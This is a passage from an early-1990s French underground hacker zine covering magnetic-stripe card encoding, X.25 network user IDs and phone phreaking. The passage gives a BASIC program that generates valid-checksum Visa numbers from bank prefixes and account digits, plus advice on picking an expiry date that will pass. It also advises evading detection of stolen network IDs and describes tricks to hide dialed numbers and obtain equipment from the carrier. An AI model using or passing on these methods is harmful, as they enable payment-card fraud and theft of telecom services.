terminaux. Les informations sont cod‚es en bi-phase le mieux ‚tant de voir le dessin pour comprendre: Signal ÚÄÄÄ¿ ÚÄÄÄ¿ ÚÄ¿ ÚÄ¿ Ú ÚÄÄÄ¿ ÚÄ¿ ÚÄ¿ ÚÄÄÄ¿ Ù ÀÄÄÄÙ À Ù ÀÄÙ ÀÄÙ Ù ÀÄÙ ÀÄÄÄÙ ÀÄÙ À Valeur 0 0 0 1 1 0 1 0 1 0 Simple non ?? Le bit est cod‚ suivant deux fr‚quence la fr‚quence pour le 1 ‚tant deux fois celle du 0. Un prochain article int‚grera je l'espŠre le sch‚ma d'un lecteur/‚criveur de piste magn‚tique, sachez qu'une tˆte magn‚tique de magn‚tophone fait tr‚s bien l'affaire pour la lecture. Bon maintenant il faut encore savoir comment interpr‚ter les bits lus, il y a deux standard pour cela: -ANSI/ISO BCD FORMAT BCD signifie Binary Coded Decimal ou Decimal Cod‚ Binaire, le code est sur 5 bits 4 d'information et un de parit‚. La parit‚ est impaire cela signifie que chaque mot de 5 bits doit comporter un nombre IMPAIRE de 1. La lecture commence, contre toute logique, par le bit le moins significatif!! ----DONNEES---- Parit‚ b1 b2 b3 b4 b5 CaractŠre Fonction 0 0 0 0 1 0 Donn‚e 1 0 0 0 0 1 " 0 1 0 0 0 2 " 1 1 0 0 1 3 " 0 0 1 0 0 4 " 1 0 1 0 1 5 " 0 1 1 0 1 6 " 1 1 1 0 0 7 " 0 0 0 1 0 8 " 1 0 0 1 1 9 " 0 1 0 1 1 : Control 1 1 0 1 0 ; Start 0 0 1 1 1 < Control 1 0 1 1 0 = S‚parateur 0 1 1 1 0 > Control 1 1 1 1 1 ? Fin Voici donc un code purement num‚rique, pas ‚vident pour ‚crire un nom! Mais voici ZORO avec son ANSI/ISO ALPHA FORMAT: --------Donn‚es------- Parit‚ b1 b2 b3 b4 b5 b6 b7 CaractŠre Fonction 0 0 0 0 0 0 1 espace (0H) Sp‚cial 1 0 0 0 0 0 0 ! (1H) " 0 1 0 0 0 0 0 " (2H) " 1 1 0 0 0 0 1 # (3H) " 0 0 1 0 0 0 0 $ (4H) " 1 0 1 0 0 0 1 % (5H) Start 0 1 1 0 0 0 1 & (6H) Sp‚cial 1 1 1 0 0 0 0 ' (7H) " 0 0 0 1 0 0 0 ( (8H) " 1 0 0 1 0 0 1 ) (9H) " 0 1 0 1 0 0 1 * (AH) " 1 1 0 1 0 0 0 + (BH) " 0 0 1 1 0 0 1 , (CH) " 1 0 1 1 0 0 0 - (DH) " 0 1 1 1 0 0 0 . (EH) " 1 1 1 1 0 0 1 / (FH) " 0 0 0 0 1 0 0 0 (10H) Donn‚es 1 0 0 0 1 0 1 1 (11H) " 0 1 0 0 1 0 1 2 (12H) " 1 1 0 0 1 0 0 3 (13H) " 0 0 1 0 1 0 1 4 (14H) " 1 0 1 0 1 0 0 5 (15H) " 0 1 1 0 1 0 0 6 (16H) " 1 1 1 0 1 0 1 7 (17H) " 0 0 0 1 1 0 1 8 (18H) " 1 0 0 1 1 0 0 9 (19H) " 0 1 0 1 1 0 0 : (1AH) Sp‚cial 1 1 0 1 1 0 1 ; (1BH) " 0 0 1 1 1 0 0 < (1CH) " 1 0 1 1 1 0 1 = (1DH) " 0 1 1 1 1 0 1 > (1EH) " 1 1 1 1 1 0 0 ? (1FH) FIN 0 0 0 0 0 1 0 @ (20H) Sp‚cial 1 0 0 0 0 1 1 A (21H) Donn‚es 0 1 0 0 0 1 1 B (22H) " 1 1 0 0 0 1 0 C (23H) " 0 0 1 0 0 1 1 D (24H) " 1 0 1 0 0 1 0 E (25H) " 0 1 1 0 0 1 0 F (26H) " 1 1 1 0 0 1 1 G (27H) " 0 0 0 1 0 1 1 H (28H) " 1 0 0 1 0 1 0 I (29H) " 0 1 0 1 0 1 0 J (2AH) " 1 1 0 1 0 1 1 K (2BH) " 0 0 1 1 0 1 0 L (2CH) " 1 0 1 1 0 1 1 M (2DH) " 0 1 1 1 0 1 1 N (2EH) " 1 1 1 1 0 1 0 O (2FH) " 0 0 0 0 1 1 1 P (30H) " 1 0 0 0 1 1 0 Q (31H) " 0 1 0 0 1 1 0 R (32H) " 1 1 0 0 1 1 1 S (33H) " 0 0 1 0 1 1 0 T (34H) " 1 0 1 0 1 1 1 U (35H) " 0 1 1 0 1 1 1 V (36H) " 1 1 1 0 1 1 0 W (37H) " 0 0 0 1 1 1 0 X (38H) " 1 0 0 1 1 1 1 Y (39H) " 0 1 0 1 1 1 1 Z (3AH) " 1 1 0 1 1 1 0 [ (3BH) Sp‚cial 0 0 1 1 1 1 1 \ (3DH) Sp‚cial 1 0 1 1 1 1 0 ] (3EH) Sp‚cial 0 1 1 1 1 1 0 ^ (3FH) Separateur 1 1 1 1 1 1 1 _ (40H) Sp‚cial Ouf voila la parit‚ est toujours impaire, et on continue … lire le LSB en premier. On va maintenant s'interesser au donn‚es contenues dans dans les pistes ISO1, et ISO2: Les pistes T2 et T3 des cartes fran‡aise 'seraient' un redit des informations des pistes ISO2 et ISO3, cette information est non v‚rifi‚e si vous avez des renseignements.... Numero de la carte -> 1111 2222 3333 4444 Date d'expiration -> 12/99 Piste 2 (BCD,75 bpi)-> ;1111222233334444=9912101xxxxxxxxxxxxx? Piste 1 (ALPHA,210 bpi)-> %B1111222233334444^PUBLIC/JOHN^9912101xxxxxxxxxxxxx? PISTE 1 Champ # Longueur Fonction ------- -------- -------- 1 1 Start Sentinel (STX) 2 1 Format Code 3 13/16 Numero de la carte 4 1 Separateur (^) HEX 5E 5 2-26 Nom du porteur 6 1 Separateur (^) HEX 5E 7 4 Date d'expiration MMAA 8 3 CODE ??? 101 ou 000 pas d'info 9 0/5 Verification du code secret 10 Depend de 3, 5, 9 11 11 R‚serv‚ 12 1 FIN (ETX) 13 1 LRC Longueur maximum 79 CaractŠres Champ # Longueur Fonction ------- -------- ------------- 1 1 Start Sentinel (STX) 2 13/16 Numero de carte 3 1 Separateurr (=) HEX 3D 4 4 Date d'expiration MMAA 5 3 Code ??? 101 ou 000 pas d'info 6 0/5 V‚rification du code secret 7 Depend de 2, 6 8 1 Fin (ETX) 9 1 LRC LRC est une sorte de checksum qui est calcul‚ en faisant un XOR sur tout les caractŠres pr‚c‚dents sauf STX. III Le num‚ro de carte Le num‚ro inscrit sur votre carte est son identit‚e, c'est avec ‡a que toutes les op‚rations sont trait‚es. Pour une carte visa le num‚ro a 16 chiffres, les 4 premiers identifient l' ‚metteur de la carte (la banque) les deux suivants ?? les 7 suivants sont le num‚ro de compte du titulaire, les deux suivants ?? le dernier est attribu‚ de fa‡on math‚matique ce qui permettra de v‚rifier si le num‚ro de carte est valide ou non. On peut r‚sumer la situation ainsi: BBBB??NNNNNNNXXC B=Code de la banque N=Num‚ro de compte C=Checksum ?=Aucune id‚e souvent 59 ou 60 X=Nombre de carte que vous avez eu (… verifier) souvent 01 Les Banques en fonction des 4 premiers chiffres: -4970 La Poste -4975 La Bred -4972 Le Cr‚dit Lyonnais -4976 Banque Sofinco -5131 Cr‚dit Agricole Je n'en connais pas d'autre mais il suffit de regarder sur la votre pour trouver (!!?) Une fa‡on tr‚s simple d'avoir un num‚ro de compte est de regarder votre relev‚ de compte chaque fois que l'on vous fait un ch‚que le num‚ro de compte sur lequel il a ‚t‚ tir‚ est inscrit... Voila le programme (en Basic GW) permettant de calculer le num‚ro d'une visa, pour ˆtre sur d'un num‚ro de carte vous pouvez vous connecter sur Compuserve, ou appeller un num‚ro de discution porno... (Enjoy your WANKING), ou utiliser un soft shareware appel‚ Cr‚dit Card Checking (CCC) distribu‚ par l'ASP. ------------------------------------------------------------------------------ DEFINT A-Z DIM buf(15) CLS INPUT "Num‚ro de la banque (4 chiffres):", bank$ INPUT "Numero de compte (7 chiffres) :", compt$ INPUT "Les 2 chiffres apr‚s la banque :", chif2$ INPUT "Les 2 chiffres avant le checksum:", chich$ FOR j = 1 TO 3 a$ = MID$(bank$, j, 1) buf(j - 1) = VAL(a$) NEXT j FOR j = 1 TO 2 buf(j + 3) = VAL(MID$(chif2$, j, 1)) NEXT j FOR j = 1 TO 7 buf(j + 5) = VAL(MID$(compt$, j, 1)) NEXT j FOR j = 1 TO 2 buf(j + 12) = VAL(MID$(chich$, j, 1)) NEXT j FOR i = 1 TO 9 modulo = 0 buf(15) = i FOR k = 0 TO 15 IF ((k MOD 2) = (16 MOD 2)) THEN j = 2 * buf(k) ELSE j = buf(k) END IF IF j >= 10 THEN x = (j MOD 10) + 1 ELSE x = j END IF modulo = modulo + x NEXT LOCATE 10, 10 IF modulo = 0 THEN y = 3 END IF IF (modulo MOD 10 = 0) AND (y <> 3) THEN FOR z = 0 TO 15 PRINT buf(z); NEXT PRINT "" PRINT "Modulo=", modulo INPUT z END IF NEXT i ------------------------------------------------------------------------------ C'est du brut, libre … vous de rajouter des fioritures mais ‡a marche c'est le principal non?? Voila la date d'expiration est simplement un flag … l'arriv‚e, donc vous pouvez donner n'importe quoi dans la limite de deux ans apr‚s la date actuelle exemple si on est le 02/94 une date valide est situ‚e entre le 03/94 et le 02/96. IV La Puce Bon pas beaucoup d'infos la dessus, c'est un vrai microcontrolleur, avec un processeur 8 bits, de la RAM et de l' EPROM. La d‚signation officielle est CP8 c'est fabriqu‚ par Bull je ne sais pas si il y a des secondes sources (peut ˆtre Schlumberger mais pas Gemplus). La carte est s‚curis‚ par zone, la premiŠre zone en acc‚s libre comporte les informations emboss‚es (Nom, Prenom, Numero, Date d'expiration), la seconde zone peut ˆtre lu aprŠs pr‚sentation d'un code c'est la zone de transaction, un compteur comptabilise (comme tout bon compteur) les erreurs de pr‚sentation de code apr‚s 3 erreurs successives mˆme sur des terminaux diffŠrents la puce est irr‚m‚diablement bloqu‚e. La troisi‚me zone est innaccessible depuis l'exterrieur et comporte les codes de validation des programmes de cryptage qui sont au nombre de 2 RSA et DES pour plus d'information … ce sujet on peut se reporter … l'exellent livre "Cryptography and data security" aux ‚ditions Addison-Wesley. Mais sachez que pour cracker un code DES il vous fraudra quelques si‚cles avec un DX2-66 et quelques millions de fois plus pour le RSA. Je n' ai jammais entendu parler de fraude sur la puce des CB, peut etre que quelqu'un me contredirra dans un futur (plus ou moins) proche. Voila j'espŠre que ce petit fichier vous aura interess‚, dans un prochain nous nous interesserons au carte F256 qui sont les puces des cartes de t‚l‚phones. Les informations ci-dessus viennent de Phrack, Science et Vie, d' articles dans divers jounaux dont j'ai oubli‚ les noms, et du peu de choses interessantes que l' ‚ducation nationnale m'a apport‚. -%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.13 Cet article est un article de CORE-DUMP, journal Underground Hacker jamais diffuse publiquement. =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= = CORE-DUMP | Volume I | Issue 2 | Phile 3 | [NeurAlien] 01/06/92 = =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= o|-=-||-=-||-=-||-=-||-=-||-=-||-=-||-=-|o o|-=-| |-=-|o o|-=-| N U I |-=-|o o|-=-| |-=-|o o|-=-| By |-=-|o o|-=-| |-=-|o o|-=-| NeurAlien |-=-|o o|-=-| |-=-|o o|-=-||-=-||-=-||-=-||-=-||-=-||-=-||-=-|o NUI? Wot dis crap? ;) --------------------- Vous connaissez tous ce qu'est un NUI bien sur!?! Non? Eh bien c'est simple... Sur tous reseau x25, il existe des acces PAD (Packet Assembler Disassembler) qui permettent l'acces de terminaux series (V22,V22bis,V32...) au reseau x25 qui lui fonctionne par paquets de donnees. Pour cela, on paye le prix de la communication au PAD (0,13 FF pour le 3600 ou 3601 par exemple ou meme le 3613 en tarif rouge.) si c'est une communication local au reseau. C'est alors la machine a laquelle on se connecte qui supporte les charges du reseau x25. Mais si la machine n'accepte pas de supporter ces couts ou si cette machine se situe en dehors du reseau x25 sur lequel vous vous etes connecte, il vous faudra un NUI. Un NUI (Network User Id) permet la tarification des communications sur le compte du possesseur de ce NUI. C'est soit un nom suit d'un mot de passe, soit un code soit un numero. Transpac: -------- En accedant par le 3600, 3601, 36062424 ou 36069696 on accede a un PAD qui requiert pour certainnes connections (vers l'‚tranger en particulier) l'utilisation d'un NUI Intelmatique. Ce NUI avait jusqu'en Juin 1991 le format suivant: XXXX ou XXXXXX Ou X pouvait etre: A, B, C [...] Z ou 1, 2, 3, 4, 5, 6, 7, 8, 9, 0. Concernant les bruits selons lesquels un NUI serait de la forme: XXXN ou XXX serait alphabetique et N numerique, cela est TOTALEMENT faux. Maintenant, ils ont tous le format: XXXXXX. Il sont fait aleatoirement par Intelmatique et inmodifiables par l'utilisateur. Pour les utiliser: on tape son NUA puis D ou P puis le NUI: 026245911010290DXXXXXX 026245911010290P La seule particularite est qu'avec P, le NUI n'apparait pas a la saisie. (le systeme repondant a 026245911010290 est MSN, MAILBOX SYSTEM of NURNBERG et est PUBLIC) Teletel: ------- Les NUI utilises sur Teletel sont eux aussi des NUI Intelmatique sont indiferencies de ceux utilises sur TRANSPAC: on peut utiliser tous les NUI Intelmatiques sur les PADs TRANSPAC ou les PAVIs Teletel. Pour le utiliser: On tape son NUA, la touche >SUITE<, son NUI, la touche >ENVOI<. 026245911010290 >SUITE< XXXXXX >ENVOI< Tymnet: ------ On utilise un NUI Tymnet de differentes facons. Tout d'abord, l'acces ne se fait pas uniquement en France. Il y a des NUIs Tymnet qui marchent partouts, d'autres qui sont localises a un pays bien specifique. On peut utiliser en France les NUIs de deux manieres differentes: o En appelant un des quelques numeros de telephones donnant acces sur un PAD o En appelant via TRANSPAC un numero x25 en France qui est le serveur de Tymnet et ensuite en donnnant son NUI. Format du NUI Tymnet: Un NUI Tymnet est compose d'une ou de deux parties differentes. Le nom est tout le temps compose d'au moins un nom alphanumerique facilement reconnaissable. C'est souvent le nom de la personne a qui appartient le NUI ou le nom de la boite a qui appartient le NUI. ex: coke01, time01, time02, VIDEO. Et generalement, un mot de passe vient s'ajouter a ce nom pour theoriquement le proteger de toute intrusion. Pour avoir des informations sur Tymnet, tapez a la place du nom et du mot de passe du NUI: information information ou help help ou info info Gestion des NUI Intelmatiques: ----------------------------- A chaque NUI Intelmatique correspond un NUA d'appel qui est transmis au serveur sur lequel l'utilisateur se connecte grace a ce NUI. Ce NUA d'appel commence toujours par 09330 et est suivi d'un numero qui identifie ce NUI et seulement ce NUI. Donc dans une table de Intelmatique, il est indique que le NUI XXXXXX a pour NUA appelant: 09330123456789. Ainsi, en cas d'abus d'un NUI, Intelmatique peut, grace aux fichiers de trace et de logs des machines sur lesquels les utilisateurs de NUI se sont connectes, voir quel utilisateur utilisait quel NUI. Protection des NUIs et reperage des NUIs voles: ---------------------------------------------- D'une part, il est difficile de scanner un NUI du fait de sa nouvelle forme qui permet une quantite enorme de possibilites. D'autre part, TRANSPAC et Intelmatique *DOIVENT* (et c'est presque certain) avoir mis en place une securite du type TAMS comme pour TELENET/SPRINT aux USA. Cet organe de securite est charge d'espionner toutes les connections en permettant: - le trace'age simple d'un NUI: enregistre le PAVI/PAD d'appel, le NUI utilise et le numero appele pendant combien de temps - le trace'age total: enregistrement complet de toute la communication. - le trace'age des serveurs sensibles: Certains serveurs comme les ALTOS ou LUTZIFER en allemagne sont connu pour etre des reperes de Hackers et donc ceux ci utilisent souvent des NUIs voles. Donc Intelmatique et TRANSPAC scannent toutes les connections vers ces services pour detecter si un NUI a ete vole. C'est pour cela qu'il est fortement conseille d'appeler ces services via des PADs prives ou des systemes d'exploitation prives. >>>Et beaucoup d'autres securites insoupconnables je pense... Conclusion: ---------- J'espere que ces infos vous auront ete d'une quelconque aide... Toute information sur de nouveaux types de NUI m'interesse. -%!% N0 Way %!%- Volume I, Num‚ro 2, Partie 2.14 ?allo?AlLo?Welcome to...HeLlO? ZzzZZz OoOoOops Hi! Comment s'amuser ~Plik~ ou ennuyer quelqu'un o/~. o/~ -Bieeep- Avec un simple Allo? %chunk% Telephone Hello? `tchak' *KERCHUNK* This is... AT&T Online... Ah le telephone, souvent on passe … cot‚ et on se dit: "Non, je vais assurer, je vais pas passer ma soir‚e … d‚conner avec" Mais finalement on ne resiste pas et hop, c'est parti, plong‚ dans la d‚couverte de ce monde qu'est le r‚sau t‚l‚phonique. Du peu que j'ai d‚couvert par moi-mˆme et des grandes choses que j'ai appris par d'autres, je fais aujourd'hui un article. Je vais d'abord parler de comment obtenir des informations avec un t‚l‚phone. ============================================================================= On a souvent besoin de savoir le nom de la personne … qui appartient un certain num‚ro. Pour savoir cela, vous pouvez t‚l‚phoner … France Telecom au service des renseignements et normalement vous serez tax‚s de 15 Fr environ pour avoir cette information. De plus si le num‚ro indiqu‚ est en liste rouge, non seulement vous payerez 15 Fr mais vous n'aurez pas le nom de cette personne. MERCI FARCE TELECOM ! Si vous presumez que le num‚ro appartient a une soci‚t‚, vous pouvez refuser d'ˆtre taxe de 15F et juste demander a quelle soci‚t‚ appartient ce num‚ro, normalement, les op‚rateurs le disent en direct, sans rappeler et ainsi vous ne payez presque rien (et carrement rien dans une cabine telephonique). RENSEIGNEMENTs: voir pour le rappel dans une cabine telephonique ! Renseignements internationaux: meme chose que precedemment. Cacher le numero appele dans une cabine a LCD: ============================================= C'est tres simple comme principe. Un principe vieux comme le monde d'ailleur, c'est celui de la white-box. Les phone phreaks on cherch‚ le son qui "masque" le mieux les autres sons et ils l'ont trouve; c'est le WHITE TONE aussi connu en France sous le nom de bruit blanc. Il est tres facile a faire avec sa propre bouche en faisant le "CHH" de "CHUT" tres fort. Comme vous le savez, dans les cabines telephoniques a LCD, le numero que vous composez est affiche sur l'ecran et donc visible par beaucoup de monde. Ca, ca vous botte pas trop. Surtout quand c'est un numero vert d'une PBX ou VMB par exemple. Alors ce que vous pouvez faire c'est composer un numero vert bidon (totalement bidon: 05999999 par exemple, enfin, n'importe quoi puis #). Il va y avoir une pause et le telephone va commencer a composer le numero en DTMF. A partir de ce moment la, il va falloir envoyer un bruit blanc pour "couvrir" le numero de telephone et le #. Le # a pour but de terminer l'affichage des numeros tapes. Vous remarquerez que votre bruit blanc ne passe pas sur les deux premiers numeros: 0 et 5. Ca c'est normal, c'est pour eviter d'enculer FT en faisant croire a la cabine que vous appelez un numero vert et en fait appeler un 3670. :) (Avant ca marchait impec!) hehehe Une fois que la composition et le bruit blanc sont termines, vous pouvez composer sans crainte d'etre vu les 6 derniers chiffres de votre numero vert. Les services speciaux du telephone: ================================== Vous savez que le telephone a des services speciaux accessibles par le prefixe 36. Je vous conseille de scanner votre prefixe 36 dans votre coin car on tombe souvent sur des trucs marrant voir interressants. (Si vous avez un listing de ce scan, je suis pret a le publier dans No Way car c'est vraiment interressant ce que l'on peut faire avec.) Un exemple, certains numeros du 36 sont destines aux techniciens de FT pour annoncer des modifications sur les lignes etc... Exemple: vous pouvez annoncer la fin de contrat de votre M12 Philips de compettition, resultat: un super nitel a vous … vie. S'amuser "cheap" en soir‚e: ========================== D‚crochez le t‚l‚phone d'o— vous ˆtes et composez le 3644, raccrochez, d‚crochez, raccrochez. Dans la seconde qui suit, le t‚l‚phone va sonner. S'amuser "expensive" en soir‚e: ============================== Pendant que tout le monde est couch‚ en train de comater ou completement scotch‚ … l'Acid-core qui passe, t‚l‚phonez … Mike qui s'ennuie … Hawaii ou a Atlanta. :) This is the end, my friend............ ++NeurAlien